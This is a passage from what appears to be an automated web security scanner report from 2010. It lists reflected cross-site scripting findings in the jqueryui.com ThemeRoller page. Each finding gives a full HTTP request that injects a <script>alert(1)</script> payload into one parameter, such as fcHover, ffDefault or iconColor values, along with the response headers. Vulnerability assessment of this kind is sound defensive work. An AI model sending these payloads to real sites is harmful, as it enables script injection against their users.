GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636922fd"><script>alert(1)</script>bfebabdeafa&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567ab"><script>alert(1)</script>6bb62385672 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121567ab"><script>alert(1)</script>6bb62385672&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3de9"><script>alert(1)</script>10d22a8c27a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serife3de9"><script>alert(1)</script>10d22a8c27a&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba6c"><script>alert(1)</script>6024da5fef4 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em1ba6c"><script>alert(1)</script>6024da5fef4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94f"><script>alert(1)</script>389a59d3bbf was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaldd94f"><script>alert(1)</script>389a59d3bbf&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120002
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cee7"><script>alert(1)</script>abd743a9c48 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545459cee7"><script>alert(1)</script>abd743a9c48&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e87"><script>alert(1)</script>a3ea86a304c was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222287e87"><script>alert(1)</script>a3ea86a304c&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc50e"><script>alert(1)</script>3faf1eb1fc7 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888dc50e"><script>alert(1)</script>3faf1eb1fc7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46104"><script>alert(1)</script>3928c085e5 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a46104"><script>alert(1)</script>3928c085e5&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8814c"><script>alert(1)</script>b9661bee4fa was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222228814c"><script>alert(1)</script>b9661bee4fa&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef9c"><script>alert(1)</script>ed8429324bf was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7ef9c"><script>alert(1)</script>ed8429324bf&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd783"><script>alert(1)</script>5297cb49336 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545cd783"><script>alert(1)</script>5297cb49336&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa ...[SNIP]...
2.173. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e9c"><script>alert(1)</script>97c25945815 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?58e9c"><script>alert(1)</script>97c25945815=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:27:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b20"><script>alert(1)</script>b5290387e91 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShado